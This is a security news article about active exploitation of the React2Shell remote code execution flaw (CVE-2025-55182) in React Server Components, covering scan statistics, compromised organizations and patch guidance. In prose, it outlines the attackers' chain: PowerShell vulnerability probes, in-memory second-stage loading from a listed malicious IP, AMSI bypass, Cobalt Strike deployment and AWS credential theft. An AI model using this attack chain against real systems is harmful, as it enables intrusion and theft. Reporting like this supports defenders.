**Critical React2Shell Flaw Exploited to Breach 30 Organizations, Over 77k IP Addresses Vulnerable**
A critical vulnerability in the React framework, known as React2Shell, has been exploited to breach over 30 organizations across multiple sectors. The flaw, identified as CVE-2025-55182, affects all frameworks that implement React Server Components, including Next.js, and can be exploited via a single HTTP request.
Researchers have confirmed that attackers have already compromised numerous organizations using the React2Shell vulnerability. According to Shadowserver Internet watchdog group, over 77,664 IP addresses are vulnerable to the flaw, with approximately 23,700 located in the United States.
**The Vulnerability**
The React2Shell flaw is an unauthenticated remote code execution vulnerability that allows attackers to trigger remote, unauthenticated execution of arbitrary commands. This is made possible by unsafe deserialization of client-controlled data inside React Server Components.
Developers are required to update React to the latest version, rebuild their applications, and then redeploy to fix the vulnerability. The patch was released on December 3, but researchers have observed widespread exploitation of the flaw in the days following its disclosure.
**Exploitation Techniques**
Security researcher Maple3142 published a working proof-of-concept demonstrating remote command execution against unpatched servers on December 4. Soon after, scanning for the flaw accelerated as attackers and researchers began using the public exploit with automated tools.
GreyNoise recorded 181 distinct IP addresses attempting to exploit the flaw over the past 24 hours, with most of the traffic appearing automated. The scans are primarily originating from the Netherlands, China, the United States, Hong Kong, and a small number of other countries.
**Compromised Organizations**
Palo Alto Networks reports that more than 30 organizations have already been compromised through the React2Shell flaw. Attackers exploited the vulnerability to run commands, conduct reconnaissance, and attempt to steal AWS configuration and credential files.
These compromises include intrusions linked to known state-associated Chinese threat actors. Researchers and threat intelligence companies have observed widespread exploitation of the CVE-2025-55182 flaw since its disclosure.
**Attack Tactics**
GreyNoise reports that attackers frequently begin with PowerShell commands that perform a basic math function to confirm the device is vulnerable to the remote code execution flaw. These tests return predictable results while leaving minimal signs of exploitation:
- Once remote code execution was confirmed, attackers were seen executing base64-encoded PowerShell commands that download additional scripts directly into memory.
- One observed command executes a second-stage PowerShell script from the external site (23[.]235[.]188[.]3), which is used to disable AMSI to bypass endpoint security and deploy additional payloads.
According to VirusTotal, the PowerShell script observed by GreyNoise installs a Cobalt Strike beacon on the targeted device, giving threat actors a foothold on the network. Amazon AWS threat intelligence teams also saw rapid exploitation hours after the disclosure of the React CVE-2025-55182 flaw.
**Mitigation and Response**
Due to the severity of the React flaw, companies worldwide have rushed to install the patch and apply mitigations. Yesterday, Cloudflare rolled out emergency detections and mitigations for the React flaw in its Web Application Firewall (WAF) due to its widespread exploitation and severity.
CISA has also added CVE-2025-55182 to the Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply patches by December 26, 2025, under Binding Operational Directive 22-01. Organizations using React Server Components or frameworks built on top of them are advised to apply updates immediately, rebuild and redeploy their applications, and review logs for signs of PowerShell or shell command execution.